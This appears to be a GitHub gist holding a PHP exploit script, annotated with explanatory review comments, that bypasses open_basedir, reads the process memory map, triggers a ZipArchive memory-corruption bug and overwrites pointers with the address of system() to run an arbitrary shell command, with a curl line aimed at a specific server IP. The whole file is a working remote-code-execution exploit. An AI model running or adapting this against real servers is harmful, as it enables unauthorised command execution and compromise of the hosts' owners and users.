@neex neex/exploit.php Secret
Created Sep 17, 2019

// <?php // <- to make GitHub syntax highlighter happy
// Run this with `curl 'http://52.53.55.151:11514/' -F "rce=<exploit.php"`.
//
// Configuration. Everything below is tied to one specific build: the two library paths used
// further down (libphp8.so and libc-2.27.so) and the allocation sizes this script assumes.
// None of these values are derived at runtime, so the script does nothing useful elsewhere.
$command = "your command here";
// Offset of system() inside the libc named further down; only valid for that exact libc build.
$system_libc_offset = 0x000000000004f440;
// Named as the size of a stdClass allocation; used to size $good_archive_name and $memory_view.
$stdclass_instance_size = 40;
// Named as the size of a string header; $memory_view is built with
// $stdclass_instance_size - $string_header_size = 8 bytes.
$string_header_size = 32;
// The same path is also hard-coded as a literal in the payload built at the bottom of the file.
$script_name = "/tmp/xx"; // must be exactly 7 characters: "/tmp/xx" + NUL is the 8-byte first half of the 16-byte payload
// 5 + 34 = 39-character path under /tmp; ZipArchive::CREATE may leave this file behind.
$good_archive_name = "/tmp/".str_repeat("A", $stdclass_instance_size - 6);
// An existing, world-readable file that is not a zip archive.
$bad_archive_name = "/etc/passwd";
// Upper bound, in bytes, of the region scanned at the bottom of the file.
$scan_region_length = 500000;
// Resets open_basedir to "/" from within the request, or dies if that did not take.
// PHP documents open_basedir as a convenience restriction, not a security boundary, so a
// compromised worker should never be assumed to be contained by it.
// Observable side effects: creates /tmp/posos (never removed; the mkdir() result is not
// checked, so a second run warns and continues) and leaves the working directory at "/".
function bypass_openbasedir() {
chdir("/tmp");
mkdir("posos");
chdir("posos");
// Restrict to a relative path first …
ini_set("open_basedir", "..");
// … the return value of this ini_get() is discarded — NOTE(review): presumably kept for a
// side effect; nothing on this page confirms which.
ini_get("open_basedir");
// … then walk two levels up before widening the restriction to the filesystem root.
chdir("..");
chdir("..");
ini_set("open_basedir", "/");
if (ini_get("open_basedir") != "/") die("open_basedir bypass failed");
}
// Returns [start, end] (as ints) of the first executable ("r-xp") mapping in
// /proc/self/maps whose path column equals $lib, or null (implicitly) when no
// such mapping exists or the maps file cannot be read.
// A PHP worker reading its own /proc/self/maps is unusual enough to be worth
// alerting on in a hardened deployment.
function get_code_address_range($lib) {
    $pattern = "/^([0-9a-f]*)-([0-9a-f]*) r-xp .* ([^ ]*)$/m";
    $mappings = file_get_contents("/proc/self/maps");
    preg_match_all($pattern, $mappings, $rows, PREG_SET_ORDER);
    // Each row is [whole line, low hex, high hex, path]; the whole line is skipped.
    foreach ($rows as [, $lowHex, $highHex, $path]) {
        if ($path !== $lib) {
            continue;
        }
        return [intval($lowHex, 16), intval($highHex, 16)];
    }
}
bypass_openbasedir();
// Drop $command as a world-executable shell script. A php/httpd worker writing a "#!/bin/sh"
// file under /tmp and chmod-ing it 0777 is the most visible host-level artefact of this script.
file_put_contents($script_name, "#!/bin/sh\n$command\n");
chmod($script_name, 0777);
// Resolve the text ranges of exactly these two libraries. get_code_address_range() returns
// null when the path is absent from /proc/self/maps and nothing here checks for that: the
// destructuring then yields nulls and $system_addr degenerates to $system_libc_offset.
[$libphp_start, $libphp_end] = get_code_address_range("/usr/lib/apache2/modules/libphp8.so");
[$libc_start, $libc_end] = get_code_address_range("/lib/x86_64-linux-gnu/libc-2.27.so");
$system_addr = $libc_start + $system_libc_offset;
// Three ZipArchive::open() calls, two of them on /etc/passwd (not a zip), interleaved with an
// 8-byte string and a stdClass allocation. The statement order is load-bearing.
// NOTE(review): the memory-safety bug in ZipArchive this relies on is not shown on this page;
// the remediation is an updated PHP/libzip, not a configuration setting.
$archive = new ZipArchive();
$archive->open($good_archive_name, ZipArchive::CREATE);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$memory_view = str_repeat("A", $stdclass_instance_size - $string_header_size);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$instance = new StdClass();
// $memory_view was built with 8 bytes, so this check only passes if its reported length has
// changed since construction; otherwise the script stops here.
if (strlen($memory_view) < $scan_region_length) die("Exploit failed");
// Opened and closed without ever being read. NOTE(review): presumably here for its
// allocation side effect only — not confirmed by anything on this page.
$f = fopen("php://filter/convert.base64-encode/resource=/etc/passwd", "r");
// Walk $memory_view one byte at a time; wherever two consecutive qwords both fall inside
// libphp8.so's text range, overwrite those 16 bytes with "/tmp/xx\0" followed by $system_addr.
// The loop does not stop after a hit, so every matching location is patched. The path is a
// literal here rather than $script_name, which is why the 7-character rule above exists.
// If strlen($memory_view) is close to $scan_region_length, the last substr() calls return
// fewer than 16 bytes and unpack() yields fewer than two fields.
for ($offset = 0; $offset < $scan_region_length; $offset++) {
$fields = unpack("Q*", substr($memory_view, $offset, 16));
if ($fields[1] >= $libphp_start && $fields[1] <= $libphp_end &&
$fields[2] >= $libphp_start && $fields[2] <= $libphp_end) {
$payload = "/tmp/xx\x00".pack("Q", $system_addr);
for ($i = 0; $i < 16; $i++) {
$memory_view[$offset + $i] = $payload[$i];
}
}
}
fclose($f);